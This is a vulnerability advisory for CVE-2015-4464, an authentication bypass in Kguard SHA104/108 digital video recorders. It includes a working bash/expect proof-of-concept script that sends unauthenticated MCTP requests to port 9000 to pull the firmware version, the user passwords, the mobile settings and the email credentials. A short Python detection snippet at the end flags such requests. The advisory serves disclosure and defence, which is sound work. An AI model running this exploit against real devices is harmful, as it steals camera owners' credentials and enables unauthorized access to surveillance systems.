
Kguard Digital Video Recorder Bypass Issues

Posted Jun 24, 2015
Authored by Federick Joe P Fajardo

A deficiency in handling authentication and authorization has been found with Kguard 104/108/v2 models. While password-based authentication is used by the ActiveX component to protect the login page, all communication with the application server on port 9000 is accepted directly, with insufficient or improper authorization. Proof of concept exploit included.

tags | exploit, activex, proof of concept
advisories | CVE-2015-4464
MD5 | 193e1c13c376a9696db8861bf83eb8b8

CVEID: CVE-2015-4464

SUBJECT: Insufficient Authorization Checks in Request Handling: Remote
Authentication Bypass for Kguard Digital Video Recorders

DESCRIPTION: A deficiency in handling authentication and authorization
has been found with Kguard 104/108/v2 models. While password-based
authentication is used by the ActiveX component to protect the login page,
all communication with the application server on port 9000 is accepted
directly, with insufficient or improper authorization.

CVSS Base Score: 9.7
CVSS Temporal Score: 8.3
CVSS Environmental Score: Undefined
CVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:P/E:F/RL:U/RC:UR)

Affected Products and Versions

Kguard Digital Video Recorders: KG-SHA104/KG-SHA108/v2. Other variants
that run the same firmware from Zhuhai Raysharp Technology Co Ltd are
believed to be vulnerable.

Exploit / Proof of Concept:

https://goo.gl/L5ASRo (or see below)

Remediation/Fixes

None.

Workarounds and Mitigations

See: [06]

References:

[01] http://www.securityfocus.com/archive/1/534830
[02] http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527
[03] http://osvdb.org/show/osvdb/119402
[04] http://osvdb.org/show/osvdb/119422
[05] http://osvdb.org/show/osvdb/119403
[06] https://www.academia.edu/11677554/Kguard_Digital_Video_Recorders_Multiple_Vulnerabilities



------ kguard-exploit-poc.txt -----

#!/bin/bash
# Title: Kguard Digital Video Recorders POC Exploit
# Author: Eric Fajardo - fjpfajardo@ph.ibm.com / 06/15/2015

# CVE-2015-4464 - This POC demonstrates the exploitation of security flaws
# found in Kguard SHA104/108 models. These Digital Video Recorders suffer
# from a design flaw in the protocol implementation which makes the product
# insecure. Access to these devices is designed for Internet Explorer and
# uses ActiveX to bridge the communication from the browser to the DVR's
# application server. The communication layer between the ActiveX control
# and the application server has no authentication and authorization
# mechanism, which may lead to the exposure of all credentials in the device
# and the ability to make unauthorized modifications to the config, including
# functions which can potentially make the device inoperable.

# A full disclosure can be read at:
# https://www.academia.edu/11677554/Multiple_Vulnerabilities_with_Kguard_Digital_Video_Recorders

HOSTID="$2"
PORTID="$3"
NARGS=3    # option, hostname and port are all required (see USAGE)
BARGS=65

main(){
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
printf "USAGE: $0 {OPTION} {HOSTNAME} {PORT}\n";
printf "EXAMPLE: $0 --getver dvr.johndoe.com 9000\n\n";
printf "WHERE:\n";
printf "\033[1m--getver\033[0m\t- Get the firmware version.\n";
printf "\033[1m--getcred\033[0m\t- Get the DVR's usernames/passwords.\n";
printf "\033[1m--getmobile\033[0m\t- Get the DVR's mobile phone config.\n";
printf "\033[1m--getemail\033[0m\t- Get the email/password if configured.\n";
}

# 01 - EXECUTE GETVERSION
function execute_getver(){
echo "[X] - Running option getver...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_MEDIA_GetShowAttr MCTP/1.0\n"
send "CSeq:1\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:15\n\n"
send "Segment-Num:0\n"
expect "MCTP/1.0 200 OK"
sleep 3
# \x1d is the telnet escape character (Ctrl-]); it returns to the telnet> prompt
send "\x1d"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

# 02 - EXECUTE GETCRED
function execute_getcred(){
echo "[X] - Running option getcred...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0\n"
send "CSeq:2\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:51\n\n"
send "Segment-Num:1\n"
send "Segment-Seq:1\n"
send "Data-Length:4\n\n\n\n"
send "...\n"
expect "MCTP/1.0 200 OK"
sleep 3
# \x1d is the telnet escape character (Ctrl-]); it returns to the telnet> prompt
send "\x1d"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

# 03 - EXECUTE GETMOBILE
function execute_getmobile(){
echo "[X] - Running option getmobile...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0\n"
send "CSeq:1\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:15\n\n"
send "Segment-Num:0\n"
expect "MCTP/1.0 200 OK"
sleep 3
# \x1d is the telnet escape character (Ctrl-]); it returns to the telnet> prompt
send "\x1d"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

# 04 - EXECUTE GETEMAIL
function execute_getemail(){
echo "[X] - Running option getemail...";
/usr/bin/expect<<EOD
set timeout 20
spawn telnet $HOSTID $PORTID
expect "Escape character is"
send "REMOTE HI_SRDK_NET_GetEmailAttr MCTP/1.0\n"
send "CSeq:1\n"
send "Accept:text/HDP\n"
send "Content-Type:text/HDP\n"
send "Func-Version:0x10\n"
send "Content-Length:15\n\n"
send "Segment-Num:0\n"
expect "MCTP/1.0 200 OK"
sleep 3
# \x1d is the telnet escape character (Ctrl-]); it returns to the telnet> prompt
send "\x1d"
expect "telnet>"
send "quit\r"
exit 1
EOD
}

[[ $# -lt $NARGS ]] && main && exit $BARGS
case $1 in

--getver )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getver
exit 0
;;

--getcred )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getcred
exit 0
;;

--getmobile )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getmobile
exit 0
;;

--getemail )
printf "\033[1mKGUARD EXPLOIT: KGUARD-EXP-POC.SH - `date`\033[0m\n";
execute_getemail
exit 0
;;


*)
# unknown option: main prints the banner and usage
main
exit $BARGS
;;
esac
exit 0
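The request format the PoC sends to port 9000 (a "REMOTE <function> MCTP/1.0" request line, colon-separated headers, a blank line, then a segment body) is regular enough to parse in a monitoring pipeline. The following is an added example, not part of the advisory or the PoC: it parses a captured request and raises an alert when one of the credential- or config-returning functions named above is requested from a source outside an allow-list; the allow-list prefix and the sample capture are constructed assumptions.

```python
"""Parse MCTP/1.0 requests seen on a Kguard/Raysharp DVR's port 9000 and flag
sensitive, unauthenticated function calls (added example, not advisory code)."""
import re

# Functions the PoC shows returning credentials or account configuration.
SENSITIVE_FUNCS = {
    "HI_SRDK_SYS_USERMNG_GetUserList": "DVR user list / passwords",
    "HI_SRDK_NET_GetEmailAttr": "e-mail account / password",
    "HI_SRDK_NET_MOBILE_GetOwspAttr": "mobile access configuration",
}
REQUEST_LINE = re.compile(r"^REMOTE (\S+) MCTP/1\.0$")

# Constructed capture, modelled on the PoC's --getcred request.
SAMPLE_CAPTURE = (
    "REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0\n"
    "CSeq:2\nAccept:text/HDP\nContent-Type:text/HDP\n"
    "Func-Version:0x10\nContent-Length:51\n\n"
    "Segment-Num:1\nSegment-Seq:1\nData-Length:4\n\n\n\n"
)


def parse_mctp_request(raw):
    """Return (function, headers, body) for an MCTP/1.0 request, else None."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # skip malformed header lines rather than failing
            headers[name.strip()] = value.strip()
    return match.group(1), headers, body


def classify(raw, src_ip, trusted_prefixes=("10.0.0.",)):
    """Alert on a sensitive function requested from an untrusted source.
    trusted_prefixes is an assumed allow-list of address prefixes; the
    protocol itself carries no credential to check."""
    parsed = parse_mctp_request(raw)
    if parsed is None:
        return None
    func, headers, _ = parsed
    if func not in SENSITIVE_FUNCS or src_ip.startswith(trusted_prefixes):
        return None
    return "ALERT %s -> %s (%s) CSeq=%s" % (
        src_ip, func, SENSITIVE_FUNCS[func], headers.get("CSeq", "?"))


if __name__ == "__main__":
    print(classify(SAMPLE_CAPTURE, "203.0.113.7"))
```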